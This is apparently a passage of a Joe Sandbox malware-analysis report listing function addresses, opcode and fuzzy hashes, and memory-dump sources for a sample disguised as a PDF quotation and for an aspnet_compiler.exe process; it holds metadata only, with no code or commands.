Source File: 00000000.00000002.2667005161.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34790000_QUOTATION_SEPQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6279cff456929fb492b040f0751098209da866c65d3a52012cb9cc973fcac026
Instruction ID: 9f27661ebe3828baac497bb0d71ce909da9ae77821aec23e9b4f226549b4111f
Opcode Fuzzy Hash: 6279cff456929fb492b040f0751098209da866c65d3a52012cb9cc973fcac026
Instruction Fuzzy Hash: 41912AB3B0855A9BD751FBACE8A76FE77A0EF0231CF0402B2D148D7183ED1864558785

Function 00007FFD347937FA Relevance: .3, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2667005161.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34790000_QUOTATION_SEPQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4dd23dde1f0efaf6d25463e81968fa77fcb6c38fa3edba324b35955a2da911bc
Instruction ID: c1a324055ca684613c487a6ac01eb9426f18b718932aa4c9bcbc012b42e90502
Opcode Fuzzy Hash: 4dd23dde1f0efaf6d25463e81968fa77fcb6c38fa3edba324b35955a2da911bc
Instruction Fuzzy Hash: 96915D57A0D5A76BE721B7F8B8B75FE3B54CF0323DB0842B7E1CC990939D1820958295

Function 00007FFD347947F2 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2667005161.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34790000_QUOTATION_SEPQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7da9c53d6cd42dcd12980134b9622e2d8fe39b9d5a428646b9d5084d4fd572f5
Instruction ID: 628a7ed89a6c766895adb90a6b649f82587b4724158e2f4304cb0046894f6d09
Opcode Fuzzy Hash: 7da9c53d6cd42dcd12980134b9622e2d8fe39b9d5a428646b9d5084d4fd572f5
Instruction Fuzzy Hash: E3412832B0C55A8FD700EBA8D4A26FE7BA1EF87355F080176C64DD7282CA296545C7E1

Function 00007FFD347939FA Relevance: .1, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2667005161.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34790000_QUOTATION_SEPQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25a56dcd77e0704188a2cc849b2a2b2c0fa08ce08cab7d0d7a8c666ae3a1eef8
Instruction ID: 52278fbb8ad19c9f6279f6e6265058da6205319b9b71ac33ee678c9491f45c26
Opcode Fuzzy Hash: 25a56dcd77e0704188a2cc849b2a2b2c0fa08ce08cab7d0d7a8c666ae3a1eef8
Instruction Fuzzy Hash: 68417E57A0D5976BEB2277F864B61FE7FA4DF03228B0C42B3E0CC98093DD1864998285

Function 00007FFD347908A1 Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2667005161.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34790000_QUOTATION_SEPQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bfcd0c24800ef0e2603d1ca53a6e6421666f98531e756f5442bedea12764804
Instruction ID: aa12201fc59bdd3ce4c689425c5f9b4b7fa0d2fed8a185dbfc10dde75e03ec7f
Opcode Fuzzy Hash: 6bfcd0c24800ef0e2603d1ca53a6e6421666f98531e756f5442bedea12764804
Instruction Fuzzy Hash: 48414F70A1895DCFDB84EF58C494AEDBBF1FF59310F1440AAD159E7292CB39A841CB90

Function 00007FFD347942D0 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2667005161.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34790000_QUOTATION_SEPQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4dfe673a33bde214d90a0a8e855b9d99e8bcf1398e12f9dda8a07ba47662289f
Instruction ID: c8b2492c69692c2c7cf71b5a141a19b0548119a9026b7d70a8ffb77efe4f7e0f
Opcode Fuzzy Hash: 4dfe673a33bde214d90a0a8e855b9d99e8bcf1398e12f9dda8a07ba47662289f
Instruction Fuzzy Hash: 39414E70A1894D8FDB95EF98C4A4AEDBBF1FF59300F14017AD449E7391CA34A881CB91

Function 00007FFD34791FE2 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2667005161.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34790000_QUOTATION_SEPQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff46e3f3e2168626316dc31d4278f5e30024a0f4c8caf60d798c430cf3cb8d85
Instruction ID: 5203baa1ed8b5297aa45ae58e03323c39b8beae0f56abaa258a98f52670d4427
Opcode Fuzzy Hash: ff46e3f3e2168626316dc31d4278f5e30024a0f4c8caf60d798c430cf3cb8d85
Instruction Fuzzy Hash: D8417F71B1894D8FEB94EBA8C4657EE77E1FF59300F040575E50DE7292CE38A8418790

Function 00007FFD34791FD7 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2667005161.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34790000_QUOTATION_SEPQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d2de1999f069cd6c7367fdea193416687f64891d2217b7e0f28cf6f93e94797
Instruction ID: 484f6710c8d908664fe06dcfb01bb05f0bb8d7e192308e93ec9722dd64c54e0f
Opcode Fuzzy Hash: 1d2de1999f069cd6c7367fdea193416687f64891d2217b7e0f28cf6f93e94797
Instruction Fuzzy Hash: AF418371A1854D8FEB95EB68C8656EEB7F1FF45300F0405B6E449E7292CE28AC40C791

Function 00007FFD34794800 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2667005161.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34790000_QUOTATION_SEPQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d858e80d11fea40c31e1a981c235f2037bb93f197020a512c5ffda20478602cd
Instruction ID: 1e3e023f0991a9922c09fe12d1ef0212b5922eccd244ae9643655187ac4a8d83
Opcode Fuzzy Hash: d858e80d11fea40c31e1a981c235f2037bb93f197020a512c5ffda20478602cd
Instruction Fuzzy Hash: 7A11AF71B0C54A8FDB54DB68C4A16FFBBA1EF87311F0401BAD149E6682CA38689497D1

Function 00007FFD34797D1D Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2667005161.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34790000_QUOTATION_SEPQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de1dede56137b9fc27aac7be28356ff63fe8d445b10c2e0e70c678b074c7779e
Instruction ID: f4b96b108944f1195363eea9603d1542b5b33b84a9e58c51a66b395aa9bbce2e
Opcode Fuzzy Hash: de1dede56137b9fc27aac7be28356ff63fe8d445b10c2e0e70c678b074c7779e
Instruction Fuzzy Hash: D9119A72A18A4D8FDF80EF5CC899AEE37F0FF6A315F000066E409D3251DA34A444CB80

Function 00007FFD34793C5D Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2667005161.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34790000_QUOTATION_SEPQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e0cce0088c1b51e14d58c60df0693d8bf0b64a7121767002442c86903104d27
Instruction ID: 8a70b659ea4f0dfa3e1b37a3f2d3d46b57a49d131deaa855b8d9a582d5f79e0e
Opcode Fuzzy Hash: 1e0cce0088c1b51e14d58c60df0693d8bf0b64a7121767002442c86903104d27
Instruction Fuzzy Hash: 51118231A0855DCFDB54EF99D4556FF77B4EB85311F04053AE509E2290CA38A994DBC0

Function 00007FFD34790ACD Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2667005161.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34790000_QUOTATION_SEPQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 850b9cb466d677ff00d8b55372f21189bc731a9e522cac9c840b57d9a4461268
Instruction ID: 41a3db7b2d81fc7934e9f5d4512edfa3b6c0abef53c932c14181cd73cf942682
Opcode Fuzzy Hash: 850b9cb466d677ff00d8b55372f21189bc731a9e522cac9c840b57d9a4461268
Instruction Fuzzy Hash: D301D670A195DA8FDB81DF2848616EA7BE0EF57240B0505EBD55CC7292CB28790187C1

Function 00007FFD34793ED3 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2667005161.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34790000_QUOTATION_SEPQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 556c9d7d27351a80f5fff514cf2d701f223dc9d7f2af82f6d54b1352b6712d02
Instruction ID: 7f777b7c768f8cc842f155ad04e93955da29ba78bffe5f9e07b672104a2a975a
Opcode Fuzzy Hash: 556c9d7d27351a80f5fff514cf2d701f223dc9d7f2af82f6d54b1352b6712d02
Instruction Fuzzy Hash: E5110A76A0D6CA9FD7129B285CA55ED7F60EF03208F0505F7E548C71C3DA28A149D791

Function 00007FFD34790A52 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2667005161.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34790000_QUOTATION_SEPQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48d27ec5788015657a5744f03fc33b2238ef51b8624475ea5a3796cabd1d6188
Instruction ID: 6dfb4d9adfbb1fb00dbff3d9d1cf016b1c667ab0b540c0ccb339fdd7d6266c64
Opcode Fuzzy Hash: 48d27ec5788015657a5744f03fc33b2238ef51b8624475ea5a3796cabd1d6188
Instruction Fuzzy Hash: 8901F730B5DA8A4FE745A77844296A877D1EF5A350B4800F9C54CCB2A3DD1CE8818380

Function 00007FFD34797CCD Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2667005161.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34790000_QUOTATION_SEPQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb8d3512bc7a342c509fc15014b01702715eba656e3d93817049987bba731678
Instruction ID: 4502a1e70d6effe50f09d18c6c68e3d2b242b75a6b02f1e47aec07da320a6662
Opcode Fuzzy Hash: bb8d3512bc7a342c509fc15014b01702715eba656e3d93817049987bba731678
Instruction Fuzzy Hash: 8601AD32A0894D8FDB44EF58D495AF937A0FF56319F0400A6D508D6151CA35A955CBC1

Function 00007FFD34793EE0 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2667005161.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34790000_QUOTATION_SEPQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afa1ef85062576c421860ba0ef99806624fb1d70f06f023d1148daf7f2177442
Instruction ID: 964435096174375365705e6f2279fc5a06849d6627ce97944ad624a6b8e05ca4
Opcode Fuzzy Hash: afa1ef85062576c421860ba0ef99806624fb1d70f06f023d1148daf7f2177442
Instruction Fuzzy Hash: 4A11E5B290D78A5FD712AB7858A56FE3F64EF03218F0801F6E448D61C3DA28A059C391

Function 00007FFD3479B044 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2667005161.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34790000_QUOTATION_SEPQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 581a05922a0a02d024dee43a0801dd9456f89077314bb496b253cda8487beb0c
Instruction ID: d2a35f6fd7567a8259a228c3444d25ca8b209a40528656e88a9d61678568bf86
Opcode Fuzzy Hash: 581a05922a0a02d024dee43a0801dd9456f89077314bb496b253cda8487beb0c
Instruction Fuzzy Hash: 5921BEB1E4872ACEDB64DF15C854BF8B7B1AB16319F4040F9D10DD2591CB786A84DF41

Function 00007FFD3479E92C Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2667005161.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34790000_QUOTATION_SEPQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 771f07a931163d9964edaa5fa41cdede70410a2e609925baba983b6fa88797c3
Instruction ID: ce100b8c3e4c916a97621f6af8e2893cffcc3d4d508f365caab6b66db86e873c
Opcode Fuzzy Hash: 771f07a931163d9964edaa5fa41cdede70410a2e609925baba983b6fa88797c3
Instruction Fuzzy Hash: AE110DB1A0851ACBEB64EB54C898BECB3B1FB55304F1041F9C60DE2290CE786AC4CF85

Function 00007FFD347984D3 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2667005161.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34790000_QUOTATION_SEPQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6483d6daf2e872014167a3e4301f97e88fec0c2fbde6ea8e7ff40b5954665a0e
Instruction ID: 9f4a18b504d834c9d2699cf31c0355fc92a5fdaf6caf424e136a144fa7e2fc0b
Opcode Fuzzy Hash: 6483d6daf2e872014167a3e4301f97e88fec0c2fbde6ea8e7ff40b5954665a0e
Instruction Fuzzy Hash: EB012870A08A4CDFDF84EF58C899AE97BE0FF69315F10056AE40DD3290DB75A954CB81

Function 00007FFD34797D10 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2667005161.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34790000_QUOTATION_SEPQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c378991e6a55022d93ca4615501aa439161d4843d164d2fb4675d061a32a6e7
Instruction ID: c0ec287050fddf58ef50044595880f76391827a345c262a9a9d79b166556207f
Opcode Fuzzy Hash: 4c378991e6a55022d93ca4615501aa439161d4843d164d2fb4675d061a32a6e7
Instruction Fuzzy Hash: B101317091990DDFDF94EF58C4A5AF97BB0FF2A305F10446AE40DD3195CA35A594CB80

Function 00007FFD347940CD Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2667005161.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34790000_QUOTATION_SEPQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1a9224369046f2404d67f64e7bee72411f2b3b82159ef0aa65d5ae9e93f6852
Instruction ID: db66026095b00b9f581fac06ffa0ea9a42e577825cdf60c06bdadf03545612f2
Opcode Fuzzy Hash: e1a9224369046f2404d67f64e7bee72411f2b3b82159ef0aa65d5ae9e93f6852
Instruction Fuzzy Hash: D6F01D70A0860DDBDB90EF58D4996EE77A0FB55300F114476E508D2250DA3865A0D780

Function 00007FFD347940F0 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2667005161.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34790000_QUOTATION_SEPQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc0d641a7216868803916785b9e043f00ec0706aaca36d89821aa9ba6bfdf88e
Instruction ID: 48d5adda7c5fefedb2021b2cb4f9720acb980557edc4585b5984e92739005064
Opcode Fuzzy Hash: dc0d641a7216868803916785b9e043f00ec0706aaca36d89821aa9ba6bfdf88e
Instruction Fuzzy Hash: D7F01C70918A0DDFDB94EF68D8897EA7BE0FF59304F004466E81CD2250DA34A6A0CB80

Function 00007FFD34793FE8 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2667005161.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34790000_QUOTATION_SEPQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fffa468a39d10d9507f10512f40b5e910d2266cb1572c558ad182a5f683af9fb
Instruction ID: 656399a18f1a46d89506f69edc9993bcb058af290afb9dcf9b8113483e5bdab2
Opcode Fuzzy Hash: fffa468a39d10d9507f10512f40b5e910d2266cb1572c558ad182a5f683af9fb
Instruction Fuzzy Hash: FEF0307092464DDFDB90EF6484486E977A0FF05305F40047AF418C2291DA38B1A0CB81

Function 00007FFD34793F30 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2667005161.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34790000_QUOTATION_SEPQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9061582af2275cd3459d5ee13dbb211f1cd395c8ee5ffb55b37bf87a69394a98
Instruction ID: 7656622cc499e19749c0b56e5b66fafe8edcfd553c75dfa4093f3f05ae8d047e
Opcode Fuzzy Hash: 9061582af2275cd3459d5ee13dbb211f1cd395c8ee5ffb55b37bf87a69394a98
Instruction Fuzzy Hash: 36E01A70928A4DDFDB94EF6484547EEB7A0FF05304F4004BAE41DD2281EB38B6A4DB82

Function 00007FFD34790890 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2667005161.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34790000_QUOTATION_SEPQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b4868d323642bc687528715fdc8b5e090f9fb06eae5602662149ff43b402034
Instruction ID: fafdeb5c7eea46b91d1d0b113334c1315e1f5abf4e172cf746fbafe5fbc6a333
Opcode Fuzzy Hash: 6b4868d323642bc687528715fdc8b5e090f9fb06eae5602662149ff43b402034
Instruction Fuzzy Hash: 5DA00245DA784E42984831BE1DD749475505B8B614FD51174E918C0197E88E25E912E3

Non-executed Functions

Function 00007FFD34960415 Relevance: 2.8, Strings: 2, Instructions: 337COMMON

Download Yara Rule

Strings

4, xrefs: 00007FFD34960628
0_^, xrefs: 00007FFD349606C2

Memory Dump Source

Source File: 00000000.00000002.2670862828.00007FFD34950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34950000_QUOTATION_SEPQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID: 0_^$4
API String ID: 0-1108559558
Opcode ID: 5935a952109181cd3857cc5974f1e8287f00d6f13ada5e530b276d15ef1c5213
Instruction ID: 6976647a250a1f8b43a2a26541e02caca104942259c95b688b765946decc7a57
Opcode Fuzzy Hash: 5935a952109181cd3857cc5974f1e8287f00d6f13ada5e530b276d15ef1c5213
Instruction Fuzzy Hash: DBC13D6298E3C22FE313873458B64E57FA49E4323871E01EBC5D4CB4A3DA1D265AD372

Function 00007FFD349504F8 Relevance: 2.7, Strings: 2, Instructions: 216COMMON

Download Yara Rule

Strings

>1_^, xrefs: 00007FFD34950601
1_^, xrefs: 00007FFD349506C9

Memory Dump Source

Source File: 00000000.00000002.2670862828.00007FFD34950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34950000_QUOTATION_SEPQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID: 1_^$>1_^
API String ID: 0-2142292170
Opcode ID: 6444a3cb1b1b7e47b77bfd30b7ba778ddcc8cbf571c0c022d2bf13441396a37e
Instruction ID: 6d8a8a9ae0035cc7a5584df5f203ab5e72dcdd2a351134cc6bfbd46ca7d53c68
Opcode Fuzzy Hash: 6444a3cb1b1b7e47b77bfd30b7ba778ddcc8cbf571c0c022d2bf13441396a37e
Instruction Fuzzy Hash: 9971996390D6537BE321BBB8E8A30EA7B94EF0332C719417AD588D9063DE2C75568690

Function 00007FFD349605D4 Relevance: 2.7, Strings: 2, Instructions: 167COMMON

Download Yara Rule

Strings

4, xrefs: 00007FFD34960628
0_^, xrefs: 00007FFD349606C2

Memory Dump Source

Source File: 00000000.00000002.2670862828.00007FFD34950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34950000_QUOTATION_SEPQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID: 0_^$4
API String ID: 0-1108559558
Opcode ID: c195759604c5ab9e10f44cacdad4e258b8b689411ef3162efb774aa8cfe5f5a0
Instruction ID: d7b0966da81d4843914b06442a8a64baadbaf9b00addcbdb943274a27b7c762b
Opcode Fuzzy Hash: c195759604c5ab9e10f44cacdad4e258b8b689411ef3162efb774aa8cfe5f5a0
Instruction Fuzzy Hash: 09513D4294E7C32AE353963898B50A97FA49F53134B1E01FFC5D4DB093DA0C751AE362

Function 00007FFD34795DDF Relevance: 1.4, Strings: 1, Instructions: 147COMMON

Download Yara Rule

Strings

;K, xrefs: 00007FFD34795E6E

Memory Dump Source

Source File: 00000000.00000002.2667005161.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34790000_QUOTATION_SEPQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID: ;K
API String ID: 0-1937776222
Opcode ID: bc014dc8e4a840899d288b2b3ee1a099aa6f6fb2ab50acb20a202eb230dd553d
Instruction ID: 8672537c893152a0ed185c05875ace5ccd82667c00f85b0c4a9d69afb38a67e7
Opcode Fuzzy Hash: bc014dc8e4a840899d288b2b3ee1a099aa6f6fb2ab50acb20a202eb230dd553d
Instruction Fuzzy Hash: B431808BB0CD3756D22175FDB8531FE7344DBC23BAB045677D28CD8047881994AB82E6

Function 00007FFD3479884D Relevance: 5.2, Strings: 4, Instructions: 151COMMON

Download Yara Rule

Strings

L_^, xrefs: 00007FFD347989C9
L_^, xrefs: 00007FFD3479897A
L_^, xrefs: 00007FFD3479892A
L_^, xrefs: 00007FFD3479886A

Memory Dump Source

Source File: 00000000.00000002.2667005161.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34790000_QUOTATION_SEPQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID: L_^$L_^$L_^$L_^
API String ID: 0-2357752022
Opcode ID: f0adf3d57fd462e7359899514e878eb8b528a5185729e0b0d4703531faeefa38
Instruction ID: 6a2f68295ac26a8fafe029d2f6cb5d6bb5d215e1b838365886e482b025a0c56d
Opcode Fuzzy Hash: f0adf3d57fd462e7359899514e878eb8b528a5185729e0b0d4703531faeefa38
Instruction Fuzzy Hash: 4841C677A1D6925BD3126B9DE8A30ED3B90FF0322D70D00F2D688CE153EA14645A86D2

Analysis Process: aspnet_compiler.exePID: 5792, Parent PID: 4004COMMON

Execution Graph

Execution Coverage:	26.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	88
Total number of Limit Nodes:	5

Executed Functions

Function 0000022934032B9C Relevance: 1.6, APIs: 1, Instructions: 382
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 0000022934032C0F

Memory Dump Source

Source File: 00000005.00000002.3400141664.0000022934010000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000022934010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22934010000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 08c3b473a1f7362871bcf2729fe2c144e163769adb635b581bed10db9dac86c4
Instruction ID: f9ed3105f6f1298210f0f308ad0321d091a8f73e61f2298b3331ce37ab2f2199
Opcode Fuzzy Hash: 08c3b473a1f7362871bcf2729fe2c144e163769adb635b581bed10db9dac86c4
Instruction Fuzzy Hash: 1EC1D730314A056FEB59EA68C4C97B9B7D1FB9A300F1651ADD44AD72C6DB30E882CF81

Function 00007FFD3485720A Relevance: 1.2, Instructions: 1165
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.3407648749.00007FFD34850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34850000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 469607204afa1f77822b62735bc803be76814639c8ae899a2c04548849919a04
Instruction ID: 92836f3fa01c015325b9c1e91e49b8d89f64a31cdb7970e00d78264293b46327
Opcode Fuzzy Hash: 469607204afa1f77822b62735bc803be76814639c8ae899a2c04548849919a04
Instruction Fuzzy Hash: B8A2EC70E0861D8FDBA9DF64C8A4BA9B7B1FF5A301F5041E9D40DE7292CA395A81CF11

Function 00007FFD34858946 Relevance: 1.1, Instructions: 1114
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.3407648749.00007FFD34850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34850000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bdf26843abd3df8e40ad5f1d9bfbccd62cbe3efcab44e4e9e1bd478b2a071903
Instruction ID: 9419de0031310d8792e6bf7dff4f6abf5ddee101c109628f149ab697a5c5206a
Opcode Fuzzy Hash: bdf26843abd3df8e40ad5f1d9bfbccd62cbe3efcab44e4e9e1bd478b2a071903
Instruction Fuzzy Hash: 9F926F30A0864E8FDB95EF68C8A47E9B7F1FF5A310F0441AAD44DE7292CA385985CF51

Function 00007FFD348599AC Relevance: .7, Instructions: 658
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.3407648749.00007FFD34850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34850000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6be7ad9f6a51b0a0dfc24b6d3aea0691cc6ab0a4a979b8553b8fc8565cca7bc9
